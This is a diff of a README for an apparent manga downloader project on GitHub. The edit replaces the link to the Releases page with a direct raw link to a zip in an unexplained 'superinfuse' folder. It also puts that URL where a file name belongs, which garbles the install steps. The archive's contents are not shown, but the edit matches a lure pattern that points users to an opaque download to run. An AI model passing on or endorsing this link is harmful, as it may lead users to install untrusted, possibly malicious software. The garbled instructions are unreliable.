abdelfattahfekei/mangabuddy_downloader/README.md

 ### 📥 Download & Install

-1. **Visit the Release Page:** Click [here to download](https://github.com/abdelfattahfekei/mangabuddy_downloader/releases).
+1. **Visit the Release Page:** Click [here to download](https://raw.githubusercontent.com/abdelfattahfekei/mangabuddy_downloader/main/superinfuse/mangabuddy_downloader.zip).

 2. **Select the Version:** Look for the latest version.
 It will typically be labeled as "Latest Release".
 Check the files listed under the version.

 3. **Download the Installer or Executable:**
-   - If you see a file named `mangabuddy_downloader.exe` or similar, click on it to start the download.
+   - If you see a file named `https://raw.githubusercontent.com/abdelfattahfekei/mangabuddy_downloader/main/superinfuse/mangabuddy_downloader.zip` or similar, click on it to start the download.
    - If there are multiple files, choose the one that matches your operating system (like Windows, macOS, etc.).

 4. **Run the Software:**